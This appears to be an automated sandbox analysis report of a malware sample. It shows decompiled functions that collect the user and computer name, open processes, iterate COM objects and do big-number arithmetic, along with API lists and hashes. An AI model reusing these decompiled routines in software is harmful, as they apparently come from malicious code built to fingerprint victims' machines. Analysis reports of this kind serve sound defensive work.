0x012b290c
0x012b2912
0x012b2915
0x012b2917
0x012b2923
0x012b2926
0x012b2926
0x012b292c
0x012b2931
0x012b2931
0x012b2937
0x00000000
0x012b2937
0x012b2845
0x00000000
0x012b286c
0x012b286c
0x012b2878
0x012b288b
0x012b2891
0x012b2899
0x00000000
0x012b2899

APIs

StrChrA.SHLWAPI(012B2197,0000005F,00000000,00000000,00000104), ref: 012B285E
lstrcpy.KERNEL32(?,?), ref: 012B288B

Part of subcall function 012B1922: lstrlen.KERNEL32(?,00000000,05249B38,00000000,012B74FF,05249D16,?,?,?,?,?,69B25F44,00000005,012BD00C), ref: 012B1929
Part of subcall function 012B1922: mbstowcs.NTDLL ref: 012B1952
Part of subcall function 012B1922: memset.NTDLL ref: 012B1964

Part of subcall function 012B5DDA: lstrlenW.KERNEL32(?,?,?,012B29F4,3D012BC0,80000002,012B2197,012B258B,74666F53,4D4C4B48,012B258B,?,3D012BC0,80000002,012B2197,?), ref: 012B5DFF

Part of subcall function 012B4AAB: RtlFreeHeap.NTDLL(00000000,00000000,012B5012,00000000,?,?,00000000), ref: 012B4AB7

lstrcpy.KERNEL32(?,00000000), ref: 012B28AD

Strings

(, xrefs: 012B290E
\, xrefs: 012B2891

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: 3f15172f29c1d93c3e45fbc9df5ebad483a238fd1e69c9c5915460f2ad2e185b
Instruction ID: 379003d0212780541f2f9ea9ad97a0fa5c342153ad8ac8079d91d47562445db9
Opcode Fuzzy Hash: 3f15172f29c1d93c3e45fbc9df5ebad483a238fd1e69c9c5915460f2ad2e185b
Instruction Fuzzy Hash: 25517A7112060BEFDF22AFA4ECC4EEA3BB9FF18384F108514FA1596161D731EA259B10

Uniqueness

Uniqueness Score: -1.00%

Function 6ED0E031, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED0E038
_Getvals.LIBCPMT ref: 6ED0E08A
_Mpunct.LIBCPMT ref: 6ED0E0C5
_Mpunct.LIBCPMT ref: 6ED0E0DF

Strings

$+xv, xrefs: 6ED0E0EA

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: Mpunct$GetvalsH_prolog3
String ID: $+xv
API String ID: 2204710431-1686923651
Opcode ID: 424649d532e19703fef1202d206298e69e9ea896dc6e5c94218b500891ab4f1a
Instruction ID: 7085c661cb8ac901f43ba55a76143b1ea70c8e9c50ac75fd7c04356db23463d5
Opcode Fuzzy Hash: 424649d532e19703fef1202d206298e69e9ea896dc6e5c94218b500891ab4f1a
Instruction Fuzzy Hash: AE21A7B1904B56AEDB21CFB5C4507BBBEFCAF09204F18091EE899C7A41D734D605CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED3FF15, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6ED3FF97
_free.LIBCMT ref: 6ED3FFBB
_free.LIBCMT ref: 6ED40148
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6ED7D3A8), ref: 6ED4015A
_free.LIBCMT ref: 6ED40314

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: 494bee4c9a487d6bf41f99cfb0f874b18b4e0c790445ada158dda6569ac61740
Instruction ID: 43728abd6a320af2e2af6e40df69f799b5a45c6121990289627b6d84b19f889f
Opcode Fuzzy Hash: 494bee4c9a487d6bf41f99cfb0f874b18b4e0c790445ada158dda6569ac61740
Instruction Fuzzy Hash: 0EC13871A04219DFDB118FE8C890ADE7BBEAF67394F24455AD890D7280F730CA46CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6ED42B27, Relevance: 7.7, APIs: 5, Instructions: 186COMMON

Download Yara Rule

APIs

Part of subcall function 6ED3F4F7: RtlAllocateHeap.NTDLL(00000000,?), ref: 6ED3F529

_free.LIBCMT ref: 6ED42C36
_free.LIBCMT ref: 6ED42C4D
_free.LIBCMT ref: 6ED42C6A
_free.LIBCMT ref: 6ED42C85
_free.LIBCMT ref: 6ED42C9C

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 36f73301606f84f21595176d10dc6c19ab20e549ac5388fa6d7ed52d15918bfd
Instruction ID: 28cc97cdb33effd559029e24bc15e052e72ba91c09bec10027b17fa1c22e21ad
Opcode Fuzzy Hash: 36f73301606f84f21595176d10dc6c19ab20e549ac5388fa6d7ed52d15918bfd
Instruction Fuzzy Hash: 4F51A372A00709EFDB50DFA9C880B9A77F8EF69718B144969E849DB250E731D941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012B137A, Relevance: 7.6, APIs: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B137A() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E012B75F6(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E012B4AAB(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x12b4565
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x012b1388
0x012b138b
0x012b138e
0x012b1394
0x012b1399
0x012b139f
0x012b13a7
0x012b13aa
0x012b13b0
0x012b13b5
0x012b13c2
0x012b13cf
0x012b13d3
0x012b13d5
0x012b13d9
0x012b13dc
0x012b13ec
0x012b143f
0x012b1440
0x012b13ee
0x012b13f3
0x012b13f4
0x012b13f9
0x012b13fc
0x012b140f
0x00000000
0x012b1411
0x012b1414
0x012b1419
0x012b1427
0x012b142a
0x012b1430
0x012b1435
0x00000000
0x012b1437
0x012b1437
0x012b143a
0x012b143a
0x012b1435
0x012b140f
0x012b1445
0x012b1446
0x012b13b5
0x012b144c

APIs

GetUserNameW.ADVAPI32(00000000,012B4563), ref: 012B138E
GetComputerNameW.KERNEL32(00000000,012B4563), ref: 012B13AA

Part of subcall function 012B75F6: RtlAllocateHeap.NTDLL(00000000,00000000,012B4F70), ref: 012B7602

GetUserNameW.ADVAPI32(00000000,012B4563), ref: 012B13E4
GetComputerNameW.KERNEL32(012B4563,?), ref: 012B1407
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,012B4563,00000000,012B4565,00000000,00000000,?,?,012B4563), ref: 012B142A

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: 5153263dda13b3fdacdc849f708032e791b24de0ca497fce31fd6d588fda44fd
Instruction ID: 2843f2e552d64100307acefc350328d20248316ba6c79ccbf4ee533c57db6f82
Opcode Fuzzy Hash: 5153263dda13b3fdacdc849f708032e791b24de0ca497fce31fd6d588fda44fd
Instruction Fuzzy Hash: 4D212B72900109FFDB10DFE8E9C9CEEBBB9EF44340B50446AE601E7200EA349B15CB11

Uniqueness

Uniqueness Score: -1.00%

Function 6ED0E244, Relevance: 7.6, APIs: 5, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6ED0E24B
_Maklocstr.LIBCPMT ref: 6ED0E2B2
_Maklocstr.LIBCPMT ref: 6ED0E2C4
_Maklocchr.LIBCPMT ref: 6ED0E2DC
_Maklocchr.LIBCPMT ref: 6ED0E2EC

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: MaklocchrMaklocstr$H_prolog3_
String ID:
API String ID: 2404127365-0
Opcode ID: b56464b04aa01fbb86894940bc0f1fe2dc453c327163e6e59ccbd42b40184fdb
Instruction ID: f06fdc74e1505d7d5561e504bf01532486136ce529515b18bd4bee22546a8531
Opcode Fuzzy Hash: b56464b04aa01fbb86894940bc0f1fe2dc453c327163e6e59ccbd42b40184fdb
Instruction Fuzzy Hash: BD2105B5C00248AADF14DFE5D884ADEBBB8EF84704F04885AE9559F255EB70DA44CB70

Uniqueness

Uniqueness Score: -1.00%

Function 6ED067FA, Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

_Maklocstr.LIBCPMT ref: 6ED0681A
_Maklocstr.LIBCPMT ref: 6ED06837
_Maklocstr.LIBCPMT ref: 6ED06854
_Maklocchr.LIBCPMT ref: 6ED06866
_Maklocchr.LIBCPMT ref: 6ED06879

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: Maklocstr$Maklocchr
String ID:
API String ID: 2020259771-0
Opcode ID: f7269a8f74e2302ec4dee884fdd5b8159326fda15ee063607bc9b2c5fcb2e779
Instruction ID: 04f182c79fa0513ef2b8fb05df31a013b4466158a9ab36b3d06a00aa86c67d63
Opcode Fuzzy Hash: f7269a8f74e2302ec4dee884fdd5b8159326fda15ee063607bc9b2c5fcb2e779
Instruction Fuzzy Hash: 0D116DB1910745BFE620DFE59840B56B7ACAB04614F08892AF2648BA80D3B4F99087B4

Uniqueness

Uniqueness Score: -1.00%

Function 6ED4CEE5, Relevance: 7.5, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6ED4CEFD

Part of subcall function 6ED41434: HeapFree.KERNEL32(00000000,00000000,?,6ED4D1C0,?,00000000,?,?,?,6ED4D4C4,?,00000007,?,?,6ED4B43B,?), ref: 6ED4144A
Part of subcall function 6ED41434: GetLastError.KERNEL32(?,?,6ED4D1C0,?,00000000,?,?,?,6ED4D4C4,?,00000007,?,?,6ED4B43B,?,?), ref: 6ED4145C

_free.LIBCMT ref: 6ED4CF0F
_free.LIBCMT ref: 6ED4CF21
_free.LIBCMT ref: 6ED4CF33
_free.LIBCMT ref: 6ED4CF45

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 2e178196f0d23bde22a3cdd23bfa2af76a561dc430d372035fa9f469cc404046
Instruction ID: 154cf7698f020a7f65d8d36d2435faa21ad70e358916e06900db5a32b64335cc
Opcode Fuzzy Hash: 2e178196f0d23bde22a3cdd23bfa2af76a561dc430d372035fa9f469cc404046
Instruction Fuzzy Hash: F1F06232616A0CDBEA80CBD8E4C0DD737DDAA22A147984C05F018DB581CB38F8848AA4

Uniqueness

Uniqueness Score: -1.00%

Function 012B1A24, Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B1A24(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x12bd2a4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x12bd294 = _t4;
					_t6 = GetCurrentProcessId();
					 *0x12bd290 = _t6;
					 *0x12bd29c = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x12bd28c = _t7;
					if(_t7 == 0) {
						 *0x12bd28c =  *0x12bd28c | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x012b1a2c
0x012b1a32
0x012b1a39
0x00000000
0x012b1a93
0x012b1a3b
0x012b1a43
0x012b1a50
0x012b1a50
0x012b1a90
0x00000000
0x012b1a90
0x012b1a52
0x012b1a52
0x012b1a57
0x012b1a69
0x012b1a6e
0x012b1a74
0x012b1a7a
0x012b1a81
0x012b1a83
0x012b1a83
0x00000000
0x012b1a8a
0x012b1a4c
0x00000000
0x00000000
0x012b1a4e
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,012B2669,?,?,00000001,?,?,?,012B1900,?), ref: 012B1A2C
GetVersion.KERNEL32(?,00000001,?,?,?,012B1900,?), ref: 012B1A3B
GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,012B1900,?), ref: 012B1A57
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,012B1900,?), ref: 012B1A74
GetLastError.KERNEL32(?,00000001,?,?,?,012B1900,?), ref: 012B1A93

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: a4e773bfc704bad994881195f9e2ba669d65f4c233cf8527be4114cc986f2f65
Instruction ID: 01299b57b4334341a702ff749bd2b01fc4a13967a58de023333c86785655cc3b
Opcode Fuzzy Hash: a4e773bfc704bad994881195f9e2ba669d65f4c233cf8527be4114cc986f2f65
Instruction Fuzzy Hash: 5AF0A4746603479BE7308B68B8EE7A53BA4AB057A5F000925E706C62CDE770E061CF15

Uniqueness

Uniqueness Score: -1.00%

Function 6ECF6020, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 183COMMON

Download Yara Rule

APIs

_Smanip.LIBCPMTD ref: 6ECF61B7
_Smanip.LIBCPMTD ref: 6ECF6205
_Smanip.LIBCPMTD ref: 6ECF6228

Part of subcall function 6ECFA230: task.LIBCPMTD ref: 6ECFA2F6

Strings

., xrefs: 6ECF6190

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: Smanip$task
String ID: .
API String ID: 1925983085-248832578
Opcode ID: a97c972c9c40ef0f9f8abdeb1bcfab63964b84afc0063167a70cb347f599d148
Instruction ID: c8dc2c511e27316a5255ee91b4493f992cfdf3aa4c1d2bd55c952bb9da8f85b1
Opcode Fuzzy Hash: a97c972c9c40ef0f9f8abdeb1bcfab63964b84afc0063167a70cb347f599d148
Instruction Fuzzy Hash: BC815371910514DFDB88CF98CA90BEEB7B5FF46304F108559D206AB2C8E7396A4ADF50

Uniqueness

Uniqueness Score: -1.00%

Function 6ED0DF66, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED0DF6D

Part of subcall function 6ED067FA: _Maklocstr.LIBCPMT ref: 6ED0681A
Part of subcall function 6ED067FA: _Maklocstr.LIBCPMT ref: 6ED06837
Part of subcall function 6ED067FA: _Maklocstr.LIBCPMT ref: 6ED06854
Part of subcall function 6ED067FA: _Maklocchr.LIBCPMT ref: 6ED06866
Part of subcall function 6ED067FA: _Maklocchr.LIBCPMT ref: 6ED06879

_Mpunct.LIBCPMT ref: 6ED0DFFA
_Mpunct.LIBCPMT ref: 6ED0E014

Strings

$+xv, xrefs: 6ED0E01F

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: Maklocstr$MaklocchrMpunct$H_prolog3
String ID: $+xv
API String ID: 2939335142-1686923651
Opcode ID: eb412cc0ed620969a944d6eba974ec23ada887836cd075474fe564445fe5134e
Instruction ID: e538593f51de61ab16893b36891998a558b850fb8ce2a9f3818a1a6c0826dd0e
Opcode Fuzzy Hash: eb412cc0ed620969a944d6eba974ec23ada887836cd075474fe564445fe5134e
Instruction Fuzzy Hash: EF2195B1904B966FD721CFB5C45077BBEFCAB08208F18491EE499C7A41D734D605CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6ED16B83, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6ED16B8A
_Mpunct.LIBCPMT ref: 6ED16C17
_Mpunct.LIBCPMT ref: 6ED16C31

Strings

$+xv, xrefs: 6ED16C3C

Memory Dump Source

Source File: 00000003.00000002.645764718.000000006ECF0000.00000020.00020000.sdmp, Offset: 6ECF0000, based on PE: false

Similarity

API ID: Mpunct$H_prolog3
String ID: $+xv
API String ID: 4281374311-1686923651
Opcode ID: eedb6607136911bd50acd655cf85654b92df1c09ea6d7fada2f47d4a286edeb3
Instruction ID: 56941c8971af9cdd497ec77efe5615432cc6cd3ac806eeaa893f971c0b513332
Opcode Fuzzy Hash: eedb6607136911bd50acd655cf85654b92df1c09ea6d7fada2f47d4a286edeb3
Instruction Fuzzy Hash: 0E2183B1904A566ED721CFB4D8507BBBEFCAB08204F140A5AE4A9C7A41D734D605CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 012B5920, Relevance: 6.2, APIs: 4, Instructions: 154
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E012B5920(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x12bd2e0; // 0x3f8a5a8
					_t5 = _t103 + 0x12be038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t118 >= 0) {
						__imp__#2(0x12bc2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t118 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t87 = __imp__#6;
							_t118 = _t61;
							if(_t118 >= 0) {
								_t63 = _v24;
								_t118 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t118 >= 0) {
									_t130 = _v20;
									if(_t130 != 0) {
										_t67 = 3;
										_v64 = _t67;
										_v48 = _t67;
										_v56 = 0;
										_v40 = 0;
										if(_t130 > 0) {
											while(1) {
												_t68 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t123 = _t123;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t118 =  *((intOrPtr*)( *_t68 + 0x2c))(_t68,  &_v8);
												if(_t118 < 0) {
													goto L16;
												}
												_t70 = _v8;
												_t109 =  *0x12bd2e0; // 0x3f8a5a8
												_t28 = _t109 + 0x12be0bc; // 0x3050f1ff
												_t118 =  *((intOrPtr*)( *_t70))(_t70, _t28,  &_v16);
												if(_t118 >= 0) {
													_t75 = _v16;
													_t118 =  *((intOrPtr*)( *_t75 + 0x34))(_t75,  &_v12);
													if(_t118 >= 0 && _v12 != 0) {
														_t79 =  *0x12bd2e0; // 0x3f8a5a8
														_t33 = _t79 + 0x12be078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t83 = _v16;
															 *((intOrPtr*)( *_t83 + 0x114))(_t83);
														}
														 *_t87(_v12);
													}
													_t77 = _v16;
													 *((intOrPtr*)( *_t77 + 8))(_t77);
												}
												_t72 = _v8;
												 *((intOrPtr*)( *_t72 + 8))(_t72);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t87(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t118;
			}

0x012b5925
0x012b592e
0x012b592f
0x012b5933
0x012b5939
0x012b593f
0x012b5948
0x012b594e
0x012b5958
0x012b595a
0x012b5960
0x012b5965
0x012b5970
0x012b5976
0x012b597b
0x012b5a9d
0x012b5981
0x012b5981
0x012b598e
0x012b5994
0x012b599a
0x012b599e
0x012b59a4
0x012b59b1
0x012b59b5
0x012b59bb
0x012b59be
0x012b59c6
0x012b59c7
0x012b59cb
0x012b59cf
0x012b59d2
0x012b59d5
0x012b59db
0x012b59e4
0x012b59ea
0x012b59eb
0x012b59ee
0x012b59ef
0x012b59f0
0x012b59f8
0x012b59f9
0x012b59fa
0x012b59fc
0x012b5a00
0x012b5a04
0x00000000
0x00000000
0x012b5a0a
0x012b5a13
0x012b5a19
0x012b5a23
0x012b5a27
0x012b5a29
0x012b5a36
0x012b5a3a
0x012b5a42
0x012b5a47
0x012b5a59
0x012b5a5b
0x012b5a61
0x012b5a61
0x012b5a6a
0x012b5a6a
0x012b5a6c
0x012b5a72
0x012b5a72
0x012b5a75
0x012b5a7b
0x012b5a7e
0x012b5a87
0x00000000
0x00000000
0x00000000
0x012b5a87
0x012b59db
0x012b59d5
0x012b59be
0x012b5a8d
0x012b5a8d
0x012b5a93
0x012b5a93
0x012b5a99
0x012b5a99
0x012b5aa2
0x012b5aa8
0x012b5aa8
0x012b5965
0x012b5ab1

APIs

SysAllocString.OLEAUT32(012BC2B0), ref: 012B5970
lstrcmpW.KERNEL32(00000000,0076006F), ref: 012B5A51
SysFreeString.OLEAUT32(00000000), ref: 012B5A6A
SysFreeString.OLEAUT32(?), ref: 012B5A99

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: cc20ebd893b44d1895bd63b866955ce29eddbb448f54354b626249cf89505fbb
Instruction ID: 1f131ab39708b405821a22259008262630acdc0c2f246a8e0d72f58b30638fea
Opcode Fuzzy Hash: cc20ebd893b44d1895bd63b866955ce29eddbb448f54354b626249cf89505fbb
Instruction Fuzzy Hash: 55513C75D0061AEFCB01DFA8C4C88EEB7B5EF89744B144594EA15FB214D731AE41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 012B3273, Relevance: 6.2, APIs: 4, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 012B32AE
SysFreeString.OLEAUT32(00000000), ref: 012B3393

Part of subcall function 012B5920: SysAllocString.OLEAUT32(012BC2B0), ref: 012B5970

SafeArrayDestroy.OLEAUT32(00000000), ref: 012B33E6
SysFreeString.OLEAUT32(00000000), ref: 012B33F5

Part of subcall function 012B3D39: Sleep.KERNEL32(000001F4), ref: 012B3D81

Memory Dump Source

Source File: 00000003.00000002.643287005.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000003.00000002.643256830.00000000012B0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643382150.00000000012BC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.643425339.00000000012BD000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.643471939.00000000012BF000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroySafeSleep
String ID:
API String ID: 3193056040-0
Opcode ID: 295424b253bd8dec53b52a7e5b32116d7f8200441147548e7a61512403cc459e
Instruction ID: 34eca8c09a531d99a4db4c4286f6c09768b01038d681c6c0e745b8d5a92c89a8
Opcode Fuzzy Hash: 295424b253bd8dec53b52a7e5b32116d7f8200441147548e7a61512403cc459e
Instruction Fuzzy Hash: D251313551060AEFDB11CFA8D884AEEB7B5FF88740B148829EA05DB310DB71ED05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012B7B30, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E012B7B30(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E012B47C4(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E012B227C(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E012B3C06(_t101,  &_v428, _a8, _t96 - _t81);
					E012B3C06(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E012B227C(_t101, 0x12bd168);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E012B227C(_a16, _a4);
						E012B3450(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L012BAED0();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L012BAECA();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E012B2420(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E012B3F60(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E012B2775(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x12bd168 + _a8 * 4) = _t66;
